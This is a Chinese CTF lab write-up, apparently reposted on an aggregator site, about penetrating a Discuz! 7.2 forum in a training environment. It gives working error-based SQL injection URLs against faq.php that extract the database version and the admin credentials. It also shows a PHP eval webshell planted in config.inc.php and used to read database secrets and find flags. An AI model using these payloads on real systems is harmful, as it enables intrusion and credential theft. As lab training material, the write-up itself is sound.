实验吧_网站综合渗透_Discuz!

news/2024/5/12 17:09:03/文章来源:https://huanghelouzi.blog.csdn.net/article/details/83243621

前言

这个一个实验吧中的环境,分值为50分,下面是题目说明。诶,发现自己很菜。
实验吧_网站综合渗透_dedecms解析地址

需要的学会或者已经掌握的知识

  1. 已知cms版本在线搜索通用漏洞
  2. 掌握菜刀或者类似的工具的使用
  3. 其他

题目说明

你是国内一流安全公司的“安全专家”,你带领的团队负责维护国内某金融网站的安全,马上临近双十一购物节,客户要求你对重点保障网站进行“授权安全检查”,希望你能找到网站的漏洞。
操作机器IP:192.168.1.2
目标机器IP:192.168.1.3

1、 在不影响客户业务的前提下,你对网站进行了“应用安全”扫描,你通过扫描发现网站存在SQL注入漏洞,你为了排除扫描器误报的可能性,你需要进行手工验证。
要求验证SQL注入的过程:
1)注入过程中使用的黑客命令
2)成功登陆网站后台的管理界面
完成以上步骤后,找到key1与kye2,可将key提交到平台得分。

2、通过手工验证,你证实了网站存在SQL注入漏洞,并能通过此漏洞获取到网站的管理员账号信息,你为了让客户重视危害,在客户授权的前提下进行了“上传shell”的操作。
要求你通过网站漏洞,通过安全技术将“webshell”上传到服务器。
需要你完成:
1)通过漏洞上传“webshell”。
完成以上步骤后,找到key4与key5,可将key提交到平台得分。

3、你将你的发现报告给了客户,客户非常认同你的专业知识水平,希望你可以利用上面的发现进一步的对网站所处的服务器进行安全测试,找到更多的漏洞。
需要你完成:
利用上面的成果对服务器进行“提取”、“远程连接”。
完全控制服务器。
完成以上步骤后,找到key5,可将key5提交到平台得分。

正文

首先访问192.168.1.3,发现是一个基于Discuz!7.2的论坛网站。
首页
通过百度等搜索引擎搜索这个版本的通用漏洞,发现存在一个sql注入漏洞,以下是payload。

http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

然后利用这个payload验证目标网站是否已经修补这个漏洞。
爆数据库版本号:

192.168.1.3/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

在这里插入图片描述
紧接着就是爆数据库管理员的用户名和密码

192.168.1.3/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(username,0x7e7e,password,0x7e7e) from cdb_members limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

在这里插入图片描述
其中的密码的hash可以通过下面的操作转明文,得到密码simple123.接着去找登录的后台界面登录。
在这里插入图片描述
第一个key1在管理中心–>站点信息–>全局的这个框框中
在这里插入图片描述
进入后台之后,接着就是找木马上传点。维持权限啊喂。
通过本地代码审计,发现这个地方可上传一句话。
在这里插入图片描述
一句话构造,记得密码不带引号,引号需要转移,否则服务会死。

xx\');eval($_POST[jedi]);?>\\

在这里插入图片描述
提交保存之后,使用菜刀连接,特别注意的是,链接的地址是xxxxx/config.inc.php
在这里插入图片描述
连接上了之后第一件事就是找配置文件。记录配置文件的密码和配置信息。
在这里插入图片描述
发现数据库配置,接着去连接数据库,即可查询另一个账号的密码,即key2

在这里插入图片描述
在这里插入图片描述
编辑后保存,连接数据库。发现三个加密后的密码值。其中的第二个就是key2(需要获取明文).

在这里插入图片描述
然后在数据库中又发现了key3
在这里插入图片描述
然后在文件管理中发现key4的压缩包,首先是下载下来。发现解压不了,然后注意到大小仅为80,所以直接使用sublime打开。得到一串十六进制的字符串,使用hackbar先十六进制再base64解码即可。
在这里插入图片描述
最后在桌面中发现最后一共key5.这里好像有点问题没有题目要求的提权,webshell的权限好像高了。

在这里插入图片描述

后言

首先这篇博文有一部分参考了别人的writeup,其次如果写的有问题的可以留言。感谢实验吧的提供的环境,但是也要吐槽一下,希望实验吧添加一些功能,比如共享剪切板。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_728343.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

实验吧_网站综合渗透_dedecms

实验吧_网站综合渗透_dedecms

前言 某天在交易平台上突然出现了你们公司大量账号以及用户信息的销售信息,老板怀疑公司的服务器被入侵了,需要你对服务器进行渗透测试找出黑客留下的5个标记,通过渗透测试的不同手段获取到隐藏在服务器中的5个key并提交到平台进行得分&…
阅读更多...
SEO人员:如何理解网站过度优化?

SEO人员:如何理解网站过度优化?

在网站优化过程中,我们经常性的会一味追求技术指标,而往往忽略网站内容建设的本质,那就是解决真实用户的搜索需求。实际上,这样的操作往往适得其反,并不能达到有效的作用,可以肯定的是任何网站优化&#xf…
阅读更多...
1分钟推荐一个深度学习领域的必备网站,高能!

1分钟推荐一个深度学习领域的必备网站,高能!

花一分钟的时间收获一个深度学习必备网站,入股不亏! 目录 深度学习领域的论文和代码 1.1 点击首页的Browse State-of-the-Art(也可以直接搜索关键词) 1.2 点击首页的Datasets 1.3 点击首页的Mesthods 深度学习领域的论文和代…
阅读更多...
2021-10-20 推荐一个在线视频格式转换的好网站https://www.zamzar.com/,我测试过mp4转到gif

2021-10-20 推荐一个在线视频格式转换的好网站https://www.zamzar.com/,我测试过mp4转到gif

一、无需麻烦注册,直接在线转换,我测试过mp4转到gif。 二,网站地址: Zamzar - video converter, audio converter, image converter, eBook converterFree online video converter, audio converter, image converter, eBook co…
阅读更多...
2021-11-29 AndroidR WiFi可以上网,但是Settings里提示“No Internet”的问题的一个解决方法,通过ping一个网站确认网络的情况。java ping 网络的代码。

2021-11-29 AndroidR WiFi可以上网,但是Settings里提示“No Internet”的问题的一个解决方法,通过ping一个网站确认网络的情况。java ping 网络的代码。

一、AndroidR WiFi可以上网,但是Settings里面提示“No Internet”。然后用设备的wifi连接到手机打开的热点不会有这样的提示。通过一翻折腾和了解现在android 增加一项检测网络性能的类NetworkCapabilities,通过这个类可以判断出网络的性能,但…
阅读更多...
2021-12-07 AndroidR(11) 连接WIFI可以上网,但是提示“No Internet”,增加一个国内可以访问的http_urls网站就可以解决问题

2021-12-07 AndroidR(11) 连接WIFI可以上网,但是提示“No Internet”,增加一个国内可以访问的http_urls网站就可以解决问题

一、目前Android引入的网络评估机制,当你连上网络后,会给目标产生204响应的服务器发送给一个请求,如果服务器返回的是状态码为204的响应,那么就被认为网络可以访问;否则,如返回的是其他状态码,那…
阅读更多...
2021-10-17 Android系统源码在线查看网站 http://androidxref.com/

2021-10-17 Android系统源码在线查看网站 http://androidxref.com/

一、 Android系统源码在线查看网站 http://androidxref.com/ 二、网站预览
阅读更多...
​2021-12-27 C、C++ java代码在线运行​网站

​2021-12-27 C、C++ java代码在线运行​网站

一、介绍两个C、C java代码在线运行​网站,有时候那里测试挺方便的,这个好的东西我以前就怎么不知道,哎。 1、代码编辑器_www.cjavapy.com 2、代码在线运行 - 在线工具 3、在线运行Java 二、运行效果图
阅读更多...
python怎么访问网站_python如何进入交互模式

python怎么访问网站_python如何进入交互模式

安装完Python,在命令行输入“python”之后,如果成功,会得到类似于下面的窗口:可以看到,结尾有3个>符号(>>>)。>>>被叫做Python命令提示符(prompt)&…
阅读更多...
tbopen链接生成工具_运营网站,自动刷外链工具真的有用吗?

tbopen链接生成工具_运营网站,自动刷外链工具真的有用吗?

很多急于求成的新手站长会忍不住试一试,那么这些工具真的有用吗,我本着实践出真知的的态度,用了几个网站去做实验,经过实际操作,在此建议各位站长慎用这种软件,一般效果会适得其反。自动刷外链工具真的有用…
阅读更多...
一个网站对应一个服务器,有一个云服务器可以对应多少个网站

一个网站对应一个服务器,有一个云服务器可以对应多少个网站

有一个云服务器可以对应多少个网站 内容精选换一换内网域名解析是基于VPC网络的域名解析过程,通过华为云内网DNS把域名(如ecs.com)转换成私网IP地址(192.168.1.1)。内网域名解析实现云服务器在VPC内直接通过内网域名互相访问。同时,还支持不经公网&#…
阅读更多...
php抓取网站的数据库,jquery+thinkphp实现跨域抓取数据的方法

php抓取网站的数据库,jquery+thinkphp实现跨域抓取数据的方法

本文实例讲述了jquerythinkphp实现跨域抓取数据的方法。分享给大家供大家参考,具体如下:今天做一个远程抓取数据的功能,记得jquery可以用Ajax远程抓取,但不能跨域。再网上找了很多。但我觉得还是来个综合的,所以我现在…
阅读更多...
Django管理网站

Django管理网站

Django管理网站 为应用程序定义模型时,Django提供的管理网站让你能够轻松的处理模型。网站管理员可使用管理网站,但普通用户不能使用。 1.创建超级用户 创建超级用户,用户名可以自己起,不一定要ll_admin。 下面的电子邮件地址也可…
阅读更多...
【论文泛读130】SEOVER:基于句子级情感取向向量的会话情感识别模型

【论文泛读130】SEOVER:基于句子级情感取向向量的会话情感识别模型

贴一下汇总贴:论文阅读记录 论文链接:《SEOVER: Sentence-level Emotion Orientation Vector based Conversation Emotion Recognition Model》 一、摘要 对于会话情感识别的任务,最近的工作侧重于说话人关系建模,但忽略了话语…
阅读更多...
jsp: 使用application对象实现网站计数器

jsp: 使用application对象实现网站计数器

任务要求: 在一些站点中,经常会看到网站计数器的功能。要点: 网站的来访人数可能会很多,有可能超过20位整数,大整数类BigInteger 使用application范围的属性保存计数。 用户每次在第一次访问时才需要进行计数的操作,而…
阅读更多...
LAMP网站架构方案分析

LAMP网站架构方案分析

LAMP(Linux-Apache-MySQL-PHP)网站架构是目前国际流行的Web框架,该框架包括:Linux操作系统,Apache网络服务器,MySQL数据库,Perl、PHP或者Python编程语言,所有组成产品均是开源软件&a…
阅读更多...
错误:网站辅助进程已被 IIS 终止(Debug 时是不是弹出)

错误:网站辅助进程已被 IIS 终止(Debug 时是不是弹出)

调试器已停止对网站执行代码。这导致 Internet 信息服务 (IIS) 认为辅助进程已停止响应。因此,ISS 终止了辅助进程。若要继续调试,必须配置 IIS 以使辅助进程继续运行。 启用“终端服务” 打开“管理工具”窗口。 单击“开始”,然后选择“控…
阅读更多...
.net网站能走多远

.net网站能走多远

刚写好了学校网站,请大家帮忙测试一下。不知道怎么sql注入,或者DDoS攻击,我也是大四什么都是摸索阶段,不过这个网站 做了好长时间了,现在终于可以上架了,希望大家能指点一二,谢谢! 地…
阅读更多...
网站运维之道 监控与报警机制

网站运维之道 监控与报警机制

接上一篇的《关于可用性》,再谈一下监控与报警机制。 监控机制 定义了网站可用性指标,如何获取网站的可用值? 监控工具该粉墨登场了。 多数网站都会倾向于利用开源软件自行搭建监控平台。笔者一向认为,即使网站有一台服务器,也应…
阅读更多...
SEO是什么意思?

SEO是什么意思?

搜索引擎优化(SEO)简单理解:它是网络推广的一种形式,简单来说就是通过seo优化,调整网站内部与网站外部的结构,使得自己的网站能够与搜索引擎更加友好,从而提升网站目标关键词在搜索引擎上的排名…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发 尧图建网站 广利置业